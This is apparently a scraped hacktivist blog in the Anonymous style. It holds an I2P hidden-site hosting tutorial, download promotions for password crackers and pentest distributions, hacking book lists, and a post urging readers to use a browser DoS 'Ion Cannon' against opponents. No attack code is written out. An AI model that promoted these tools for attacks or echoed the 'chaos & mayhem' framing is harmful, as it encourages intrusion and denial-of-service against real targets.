OpHackStorm • Posts Tagged ‘Freedom’

Guifi.net, a project for everybody

Open, Free and Neutral Network
Internet for everybody

Guifi.net, a project for everybody

Individuals, companies, administrations… they have made their lives easier thanks to Guifi.net

Visit:

No Copyright, no license. Sorry, no kitthes.

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

Wake Up NOW

We are Anonymous.
We are Legion.
We do not Forgive censorship.
We do not Forget the denial of our free rights as human beings.
Expected us to Give An EPiC Fight

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

datalove.me - a symbol you put in your blog or on your website, print on postcards or in books.

1 - copy one of these datalove symbols, or make up your own

2 - put it on a homepage

3 - link the logotype to: www.datalove.me

No Copyright, no license. Sorry, no kitthes.

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

Wake Up NOW

We are Anonymous.
We are Legion.
We do not Forgive censorship.
We do not Forget the denial of our free rights as human beings.
Expected us to Give An EPiC Fight

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

THRIVE is an unconventional documentary that lifts the veil on what’s REALLY going on in our world by following the money upstream — uncovering the global consolidation of power in nearly every aspect of our lives. Weaving together breakthroughs in science, consciousness and activism, THRIVE offers real solutions, empowering us with unprecedented and bold strategies for reclaiming our lives and our future.

Everyhere People RiseUp to Say NoMore;

Fraud
Enslavement
Economic Blackmail
Economic Slavery
Ecological Meltdown
Consuming into EXTiNCTiON

A New Way it’s Possible

The People Matter Much More
The Planet Matter Much MORE

Thinking for youself it still tax free

Wake Up NOW

We are Anonymous.
We are Legion.
We do not forgive censorship.
We do not forget the denial of our free rights as human beings.
Expected us to Give An EPiC Fight

NO©
☢☠☢
Share by MasterPirate ™ ✔
☠SHARE ☠SHARE ☠ SHARE NO© ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠ SHARE NO© ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #Anon
- #anonymiss
- #antiacta
- #attack
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #AntiCISPA
- #banksters
- #evolution
- #community
- #citizens
- #democracy
- #d0x
- #directdemocracy
- #expectus
- #free
- #freedom
- #fight
- #files
- #freeweb
- #freeanons
- #hack
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
7 months ago
2
Permalink

How to Use I2P to Host and Share Your Secret Goods on the Dark Web—Anonymously

How to Use I2P to Host and Share Your Secret Goods on the Dark WebAnonymously

Some of you might be using Tor to host hidden services, and some of you might not even know what hidden services are. If the latter’s you, do not miss this article. Why? Because you can host your websites and services on the I2P darknet. It’s safe and secure—it’s anonymous.

If you’re not quite sure what I2P is exactly, check out their site and my darknet series for a little more background information.

Get Started!

For those of you familiar with the Tor network’s hidden services, setting up an I2P eepsite will be easy. In a nutshell, you need to pick a name, then edit all the configuration files required for your site. Finally, you simply turn on and announce your site to the network. Everyone who wants to get their content up and running quickly can follow these simple steps.

Step 1 Start I2P

I2P should be running all of the time. I run my router 24/7. This is because you’re participating in random tunnels for other users’ network traffic. The more active routers on the network, the faster and more secure it is. All that being said, you can start the service with:

$ i2prouter start

Step 2 Check Your Address Book

Your I2P router maintains a list of addresses it has located on the network. This list is by no means all of them, but before coming up with a name for your site, you should check this and see if it is already taken, or if there’s something significantly similar.

That long string of letters and numbers under Destination is the eepsite key. Eepsites in I2P are addressed using a ‘key’, which is represented as a really long Base64 string. The key is somewhat analogous to an IP address and is shown on your eepsite’s I2PTunnel configuration page.

Step 3 Add Your Eepsite Content

If you are running Linux, you need to visit:

~/.i2p/eepsite/docroot/

Windows users can check out:

%APPDATA%\I2P\eepsite\docroot\

You should be looking at this (Linux):

How to Use I2P to Host and Share Your Secret Goods on the Dark WebAnonymously

Looks a lot like a normal web server, doesn’t it? This is the root directory for any files you need to host your site. Do you want SQL? Go ahead. Do you want to write a ton of it in PHP? No problem there.

The key difference between hosting a site on I2Ps darknet and the normal Internet is no one knows where your site is hosted from. Everything else works just as you would expect.

Taking a look at the index.html file, we see it’s partially set up and ready to go.

Simple!

Step 4 Servers, Tunnels, and Other Fun Things

This is where we will ‘tell’ I2P about our eepsite. Right now, it runs, but is only visible to us. Let’s take a peak at the I2P Tunnel Manager for our eepsite.

Most of these options are self explanatory. You can add your site’s name and description. You can leave the more advanced options at the bottom alone for now, unless you know what you are doing there.

Step 5 More Address Books!

Now we want to add our eepsite to an I2P address book hosted by a site such as stats.i2p. That is, you must enter your eepsite name and key into a web interface on one or more of these sites. Here is the key entry form at stats.i2p. This lets other people find you in the wild.

Again, your key is the entire local destination key on the eepsite i2ptunnel configuration page. Be sure you get the whole thing, ending with AAAA, and don’t forget to click add a key as well. Check to see if it reports that the key was added.

Since many routers periodically get address book updates from these sites, within several hours, others will be able to find your website by simply typing yoursite.i2p into their browser.

While we are speaking of address updates, this would be a good time to add some more address books to your own subscription list. Go to your subscriptions configuration page and add a couple of these for an automatically updated list of new hosts:

In Closing

Hosting a site on the I2P darknet allows you a level of anonymity not achieved with hosting on the normal ‘clear’ Internet. You can be flexible with your machine as well, being that there’s no hosting to buy and names to pay for.

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #anonfamily
- #antisec
- #antiacta
- #antiSOPA
- #antipipa
- #Backtrack
- #community
- #citizens
- #democracy
- #d0x
- #directdemocracy
- #evolution
- #expectus
- #encryption
- #free
- #freedom
- #fight
- #freeweb
- #freeanons
- #hack
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
1 year ago
Permalink

XSQL SCANNER: SECURITY AUDIT TOOL FOR MS-SQL & MYSQL & DATABASE PASSWORD CRACKER

xSQL Scanner is a advanced SQL audit tool that allows users to find weak passwords and vulnerabilities on MS-SQL and MySQL database servers.

The objective of xSQLScanner is to assist the Security Analyst or Penetration Tester in auditing the security of MS-SQL and MySQL database servers.

Features

Test for weak password fast;
Test for wear/user passwords;
Wordlist option;
Userlist option;
Portscanner
Range IP Address audit and more.

Windows – xsqlscanner-1.2.zip
Linux – xsqlscan-mono.tgz

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #Backtrack
- #BRUTUS
- #XSQL SCANNER
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #freeanons
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Hack
- #interwebz
- #insurgency
1 year ago
Permalink

MAGICTREE V1.1 – PENETRATION TESTING PRODUCTIVITY TOOL

Have you ever spent ages trying to find the results of a particular portscan you were sure you did? Or grepping through a bunch of files looking for data for a particular host or service? Or copy-pasting bits of output from a bunch of typescripts into a report? I have certainly did, and when I heard about the release of this tool, my heart was filled with joy, at last I can now spend time doing the real thing, you know what i mean:).

Lets get it straight for those that don’t or haven’t had about it.

MagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and (yeah!) report generation. In case you wonder, “Tree” is because all the data is stored in a tree structure, and “Magic” is because it is designed to magically do the most cumbersome and boring part of penetration testing - data management and reporting.

Updates

Rapid 7 NeXpose XML import (both simple XML and full XML formats are supported)
Arachni XML import (as of 0.4.0.2. Thanks to Herman Stevens of Astyran for contribution)
OWASP Zed Attack Proxy XML import (development snapshot as of 6-Feb-2012)
New matrix query interface
Bug fix (#224) Remove orphan projects does not work anymore
Bug fix (#226) NPE in dumpData()
Bug fix (#239) “Uncaught exception in Swing thread: null. null” when saving a custom query into the repo
Bug fix (#241) Corrupted reference links in report templates
Bug fix (#242) Updated report templates to honor “ignore” status

You can download MagicTree H3R3:

And read the detailed documentation here.

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #attack
- #anonymous
- #Anon
- #anonymiss
- #anonfamily
- #antisec
- #antiacta
- #antiSOPA
- #antipipa
- #community
- #citizens
- #democracy
- #d0x
- #PENETRATION
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #freeanons
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Hack
- #interwebz
- #insurgency
- #insurgent
- #lulz
1 year ago
Permalink

BRUTUS PASSWORD CRACKER – DOWNLOAD BRUTUS-AET2.ZIP AET2

Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 370,000 downloads. Development continues so new releases will be available in the near future.

Brutus was written originally to check routers etc. for default and common passwords.

Features

Brutus version AET2 is the current release and includes the following authentication types :

HTTP (Basic Authentication)
HTTP (HTML Form/CGI)
POP3
FTP
SMB
Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.

The current release includes the following functionality :

Multi-stage authentication engine
60 simultaneous target connections
No username, single username and multiple username modes
Password list, combo (user/password) list and configurable brute force modes
Highly customisable authentication sequences
Load and resume position
Import and Export custom authentication types as BAD files seamlessly
SOCKS proxy support for all authentication types
User and password list generation and manipulation functionality
HTML Form interpretation for HTML Form/CGI authentication types
Error handling and recovery capability inc. resume after crash/failure.

You can download it here:

Brutus AET2

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #UNITED AS ONE DIVIDED BY ZERO
- #anonymous
- #attack
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiacta
- #antiSOPA
- #antipipa
- #BRUTUS
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #freeanons
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Hack
- #interwebz
- #insurgency
- #insurgent
1 year ago
1
Permalink

BEST BOOKS ON HACKING AND DEFENSE SECURITY

Spread it!

These Hacking books are all part of a genre of books that show, in detail, the methods, tools, tricks and techniques used by professional hackers and crackers to find and exploit the holes in your network. Rather than simply teaching people “how to hack” these hacking books go one step further and tell you how to protect yourself and defend your network from these attacks. These are my Top Picks and Best Collated Hacking Books for this category of books.

1. Hacking: The Art of Exploitation, 2nd Edition

Hacking is the art of creative problem solving, whether that means finding an unconventional solution to a difficult problem or exploiting holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation needed to really push the envelope.

Rather than merely showing how to run existing exploits, author Jon Erickson explains how arcane hacking techniques actually work. To share the art and science of hacking in a way that is accessible to everyone, Hacking: The Art of Exploitation, 2nd Edition introduces the fundamentals of C programming from a hacker’s perspective.

Hackers are always pushing the boundaries, investigating the unknown, and evolving their art. Even if you don’t already know how to program, Hacking: The Art of Exploitation, 2nd Edition will give you a complete picture of programming, machine architecture, network communications, and existing hacking techniques. Combine this knowledge with the included Linux environment, and all you need is your own creativity.

2. Hacking Exposed: Network Security Secrets and Solutions, Sixth Edition

A lot of computer-security textbooks approach the subject from a defensive point of view. “Do this, and probably you’ll survive a particular kind of attack,” they say. In refreshing contrast,Hacking Exposed, Second Edition talks about security from an offensive angle. A Jane’s-like catalog of the weaponry that black-hat hackers use is laid out in full. Readers see what programs are out there, get a rundown on what the programs can do, and benefit from detailed explanations of concepts (such as wardialing and rootkits) that most system administrators kind of understand, but perhaps not in detail.

The book also walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of “honeypot” exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There’s a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols.

3. Hacking For Dummies

It’s bad enough when a hack occurs-stealing identities, bank accounts, and personal information. But when the hack could have been prevented by taking basic security measures-like the ones described in this book-somehow that makes a bad situation even worse. This beginner guide to hacking examines some of the best security measures that exist and has been updated to cover the latest hacks for Windows 7 and the newest version of Linux.

Offering increased coverage of Web application hacks, database hacks, VoIP hacks, and mobile computing hacks, this guide addresses a wide range of vulnerabilities and how to identify and prevent them. Plus, you’ll examine why ethical hacking is oftentimes the only way to find security flaws, which can then prevent any future malicious attacks.

Explores the malicious hackers’s mindset so that you can counteract or avoid attacks completely
Covers developing strategies for reporting vulnerabilities, managing security changes, and putting anti-hacking policies and procedures in place
Completely updated to examine the latest hacks to Windows 7 and the newest version of Linux
Explains ethical hacking and why it is essential

Hacking For Dummies, 3rd Edition shows you how to put all the necessary security measures in place so that you avoid becoming a victim of malicious hacking.

4. The Best of 2600: A Hacker Odyssey

Since 1984, the quarterly magazine 2600 has provided fascinating articles for readers who are curious about technology. Find the best of the magazine’s writing in Best of 2600: A Hacker Odyssey, a collection of the strongest, most interesting, and often most controversial articles covering 24 years of changes in technology, all from a hacker’s perspective. Included are stories about the creation of the infamous tone dialer “red box” that allowed hackers to make free phone calls from payphones, the founding of the Electronic Frontier Foundation, and the insecurity of modern locks.

5. Social Engineering: The Art of Human Hacking

From elicitation, pretexting, influence and manipulation all aspects of social engineering are picked apart, discussed and explained by using real world examples, personal experience and the science behind them to unraveled the mystery in social engineering.

Kevin Mitnick—one of the most famous social engineers in the world—popularized the term “social engineering.” He explained that it is much easier to trick someone into revealing a password for a system than to exert the effort of hacking into the system. Mitnick claims that this social engineering tactic was the single-most effective method in his arsenal. This indispensable book examines a variety of maneuvers that are aimed at deceiving unsuspecting victims, while it also addresses ways to prevent social engineering threats.

Examines social engineering, the science of influencing a target to perform a desired task or divulge information
Arms you with invaluable information about the many methods of trickery that hackers use in order to gather information with the intent of executing identity theft, fraud, or gaining computer system access
Reveals vital steps for preventing social engineering threats

Social Engineering: The Art of Human Hacking does its part to prepare you against nefarious hackers—now you can do your part by putting to good use the critical information within its pages

6. Hacking Exposed Linux, 3rd Edition

The Latest Linux Security Solutions
This authoritative guide will help you secure your Linux network—whether you use Linux as a desktop OS, for Internet services, for telecommunications, or for wireless services. Completely rewritten the ISECOM way, Hacking Exposed Linux, Third Edition provides the most up-to-date coverage available from a large team of topic-focused experts. The book is based on the latest ISECOM security research and shows you, in full detail, how to lock out intruders and defend your Linux systems against catastrophic attacks.

Secure Linux by using attacks and countermeasures from the latest OSSTMM research
Follow attack techniques of PSTN, ISDN, and PSDN over Linux
Harden VoIP, Bluetooth, RF, RFID, and IR devices on Linux
Block Linux signal jamming, cloning, and eavesdropping attacks
Apply Trusted Computing and cryptography tools for your best defense
Fix vulnerabilities in DNS, SMTP, and Web 2.0 services
Prevent SPAM, Trojan, phishing, DoS, and DDoS exploits
Find and repair errors in C code with static analysis and Hoare Logic

If you really want to enhance your hacking skills I employ you to get hold of these best hacking books. I will be adding more useful hacking books that can help develop your ability to solve both simple and complex computer problems because that what hacking generally means.

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #FREEANONS
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #hack
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
1 year ago
1
Permalink

THE ONLY TRUE GUIDE TO LEARNING HOW TO HACK

Disclaimer: There’s nothing in this document incriminating, but just in case, if you’re retarded and get caught, it’s your fault.

You stay up all night on the PC typing and typing. No, you’re not hacking. You’re begging someone on IRC to teach you how to hack! Let’s look at the facts:

1. You’re a luser and you’re annoying. No one likes you if you ask others how to hack without taking the least amount of initiative.

2. You’re not worthy of any title even resembling hacker, cracker, phreaker, etc., so don’t go around calling yourself that! The more you do, the less likely you are to find someone willing to teach you how to hack (which is an infinitesimal chance, any way).

3. You’re wasting your time (if you couldn’t infer that in the first place). Many real hackers (not those shitty script kiddies) spend all their insomniac hours reading and, yes even, HACKING! (Hacking doesn’t necessarily (but usually does) mean breaking into another system. It could mean just working on your own system, BUT NOT WINDOWS XP (unless you’re doing some really menacing registry shit, in which case, you’re kind of cool).)

You’re probably thinking, “Then what should I do. If no one’s going to help me, how can I possibly learn to hack?” Have you ever tried READING (I assume this far that you are literate). Read anything and everything you can get your hands on! I recommend hitting a computer store and looking for discount books (books that are usually out of date, but so are a lot of the systems on the ‘net, so they’re still relevant!). You’ll be surprised what you can learn from a book even when you’re paying a dollar for every hundred pages.

I recommend the following books to start off with:

—————————————
* Maximum Security I or II: this is not a guide to hacking, despite what you might have heard, but you can get enough info to learn the basics of how hackers hack! (Isn’t that more fun than being lamed, email bombed, and kicked of IRC).

* Practical Unix and Internet Security (Sec. Edition): This is mostly a book about how to secure Unix (if you don’t know what Unix is, either shoot yourself now, or read O’Reilly’s Learning the Unix OS), but half of learning to hack is learning a system from the inside out. How can you expect to hack a site (w/o using a kiddie script, which i must restate, is NOT hacking) if you don’t know how to use the system?!

* Linux Unleashed/Red Hat Linux Unleashed: these books are kind of cool. First of all, they come with Red Hat Linux (*sigh*, just go to www.linux.org and read everything there) 5.1 and 5.2 respectively (if you get the newest versions of the book, whi ch you should). Read everything you can from it.

* Sendmail in a nutshell: This is only after you read everything else. Sendmail, for those of you who still don’t know, is a program that sends mail. It sounds stupid, but this is a buggy program, and usually is the avenue of attack many hackers take because of it’s vulnerabilities.

* TCP/IP Blueprints: this will clear up a lot of things concerning TCP/IP.

* TCP/IP Administration: haven’t read it, but can’t wait to! (I’ve been bogged down by a lot of other REAL computer stuff).

After you’ve read them all, re-read them! Trust me, you gain a ton of information the second time you read them just as you gain perspicacity the second time through a movie with a twisted plot. Then, read a ton of RFCs. RFCs are Request for Comments but the people who practically shaped the Internet. Here is a good list of RFCs (the books above give about the same list):
———————-
    * RFC0760 - DoD Standard Internet Protocol
    * RFC0792 - Internet Control Message Protocol
    * RFC0819 - The Domain Naming Convention for Internet User Applications
    * RFC0821 - Simple Mail Transfer Protocol
    * RFC0822 - Standard for the Format of ARPA Internet Text Messages
    * RFC0976 - UUCP Mail Interchange Format Standard
    * RFC1123 - Requirements for Internet Hosts — Applications and Support
    * RFC1135 - The Helminthiasis of the Internet (Morris Worm)
    * RFC1244 - Site Security Handbook
    * RFC1521 - MIME (Multipurpose Internet Email Extensions) Part One
    * RFC1522 - MIME (Multipurpose Internet Email Extensions) Part Two
    * RFC1651 - SMTP Service Extensions
    * RFC1652 - SMTP Service Extension for 8bit-MIMEtransport
    * RFC1652 - SMTP Service Extension for Message Size Declaration
    * RFC1675 - Security Concerns for IPng
    * RFC1704 - On Internet Authentication
    * RFC1739 - A Primer On Internet and TCP/IP Tools
    * RFC1750 - Randomness Recommendations for Security
    * RFC1825 - Security Architecture for the Internet Protocol
    * RFC1891 - SMTP Service Extension for Delivery Status Notifications
    * RFC1892 - The Multipart/Report Content Type for the Reporting of Mail System Administrative Messages
    * RFC1893 - Enhanced Mail System Status Codes
    * RFC1894 - An Extensible Message Format for Delivery Status Notifications
    * RFC1918 - Address Allocation for Private Internets
    * RFC1920 - Internet Official Protocol Standards

That’s it for now. If anything else interests you about the Internet, try to look up an RFC for it.

Read anything you can about Internet security in general (but not stuff like “How to Hack” (but keep reading this!)). Subscribe to mailing lists. Some of my favourites are bugraq, happy hacker (interesting stuff), and MC2. By now, you should be advanced enough to breeze through Carolyn Meinel’s “Guide to (mostly) Harmless Hacking.” It’s got something interesting stuff, but not enough to be “3l1t3.”

Okay, now for the big step: the step from lamer to hacker! If you have not already, install Linux. Now it’s okay for you to go online to usenet groups and ask for help installing Linux, ‘cuz quite frankly, if pretty f*** hard! NEVER, EVER, EVER expect to get it on the first try just right. The next thing to do is learn programming. I recommend learning C++ first because it will help you understand a lot about programming, it’s easy to use, and is a lot like the other programming languages you should also learn. Read these books:

    * Teach Yourself C++ in 21 Days: the name says it all
    * Learning Perl: an AMAZING book on learning Perl
    * Programming Perl: the next step after Learning Perl
    * Perl Cookbook: the next step after Programming Perl
    * Core Java (Volume I & II): these books are by the makers of Java. Java is a really cool language to say the least, but you should at least learn C++ before so you can understand classes.

Now, you may be saying I may have been a bit hypocritical by saying not to ask how to hack but to ask about installing Linux. The thing is that Linux people are usually pretty nice, and the people who are Linux gurus want more than anything for Linux to prosper, and are willing to help you out. Oh, by the way, if you’ve installed Linux the way you want it (which does not include throwing you Linux box out the window and yelling, “I LIKE THIS JUST FINE!”), congratulations. You have now earned my respect.

Okay, I mentioned kiddie scripts earlier, and I’ll follow up on it now. Kiddie Scripts are auto hacking programs that will do all the work for you. You don’t want that. I do condone downloading them and learning from them, but don’t become a script kid die. The only place they go in life is jail (not where you want to be).

Now, you should know a great deal about hacking. You have a compendium of information at your fingertips with a mental index. You want the best advice? Don’t hack. Odds are, you will get caught, and then it goes down on your criminal record, and unless you did something fan-f***-tastic, like hacking the white house security cameras and get video of Slick Willie getting a BJ, you can pretty much kiss your computer future goodbye, cuz no one will hire a convicted hacker. If you do hack, be a white hat hacker. For example, upon breaking into a site, leave a note maybe including how to contact you (not through the phones, mail, real email address etc., do it through a hotmail account or something) or how to fix it. They may be nice enough to offer you a job! That’s right, there are some people who get paid to hack and do what they love.

In conclusion, you may have noticed that this was not a real guide to hacking.
This was a guide to LEARNING how to hack, which, if you want to be a real hacker, you will have to do

There is no one way to hack. (If so, it would be a lot easier for system administrators to keep you out!) It’s a variety of different tricks as well as the ability to keep up with current vulnerabilities in software and hardware. You should also learn how to program. Even though Kevin Mitnick was infamous among the hacker culture for being the most wanted cracker, he couldn’t even write his own exploits! That’s pretty sad. Please use whatever information you have wisely and responsibly, and distribute it only to people who are worthy of it.

Yes guys this gotta be the one !!

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #Backtrack
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Hack
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
1 year ago
1
Permalink

Sandcat Browser 2.0 Released, Penetration Testing Oriented Browser

Sandcat Browser version 2.0 includes several user interface and experience improvements, an improved extension system, RudraScript support and new extensions.

What is Sandcat Browser?

The fastest web browser combined with the fastest scripting language packed with features for pen-testers. Sandcat Browser is a freeware portable pen-test oriented multi-tabbed web browser with extensions support developed by the Syhunt team, the same creators of the Sandcat web application security scanner. The Sandcat Browser is built on top of Chromium, the same engine that powers the Google Chrome browser, and uses the Lua language to provide extensions and scripting support.

This first Sandcat Browser release includes the following pen-test oriented features:

Live HTTP Headers
Request Editor extension
Fuzzer extension with multiple modes and support for filters
JavaScript Executor extension — allows you to load and run external JavaScript files
Lua Executor extension — allows you to load and run external Lua scripts
Syhunt Gelo
HTTP Brute Force, CGI Scanner scripts and more.

User Interface & Experience Enhancements

New windows will now open in new Tabs.
Navigation bar now behaves like Firefox’s or Opera’s.
Improved multi-tab support.
Improved source tab.
Added a simple cookie logging extension.

Sandcat Browser Extension Development Kit

The Sandcat Browser Extension Development Kit is now available here. It also includes the source of all the Sandcat Browser extensions.

Added RudraScript

Syhunt RudraScript allows you to easily execute code in JavaScript, PascalScript, Perl, PHP, Python, Ruby & VBScript from within the browser and the browser extensions. Details about the RudraScript support can be found at this link

Download Sandcat Browser 2.0

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #BackTrack
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #FREEANONS
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
1 year ago
1
Permalink

BackTrack 5 R2 was released on 1st of March, 2012.

BackTrack 5 R2 Released, New Kernel, New Tools

Hacker are your Ready ? Backtrack 5 R2 finally released with bug fixes, upgrades, and the addition of 42 new tools. With the best custom-built 3.2.6 kernel, the best wireless support available at maximum speed. This release have included Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades.

Backtrack also added the following new tools to R2:

arduino
bluelog
bt-audit
dirb
dnschef
dpscan
easy-creds
extundelete
findmyhash
golismero
goofile
hashcat-gui
hash-identifier
hexorbase
horst
hotpatch
joomscan
killerbee
libhijack
magictree
nipper-ng
patator
pipal
pyrit
reaver
rebind
rec-studio
redfang
se-toolkit
sqlsus
sslyze
sucrack
thc-ssl-dos
tlssled
uniscan
vega
watobo
wcex
wol-e
xspy

Along with this, Backtrack added Wiki about Building a Pyrit Cluster, Creating a John the Ripper Cluster, Enabling PAE in BT5 R2 and Installing VMware Player on there page Read Here

Download Backtrack 5 R2

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #BackTrack
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #FREEANONS
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
1 year ago
1
Permalink

View Separately

BOIC: New Pet of the Anonymous Family

He will keep you company when you are feeling alone.

He will cheer you up when you are feeling down.

He will DoS the shit out of them when they mess with you!

Bookmark Ion Cannon: http://pastehtml.com/view/bo5x0rm5k.html

By Anonymous Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #attack
- #Anon
- #anonymiss
- #anonfamily
- #antipipa
- #antiSOPA
- #antiacta
- #antisec
- #community
- #citizens
- #democracy
- #d0x
- #evolution
- #expectus
- #free
- #freedom
- #fight
- #freeweb
- #H4ck3rz
- #hacker
- #hacking
- #hacktivist
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
1 year ago
6
Permalink

STARTUP GUIDE

Setup Intro::

1 - Setting up USB Bootdrive

2 - Truecrypt for USB and HD

3 - Additional Tools for Hacktivist

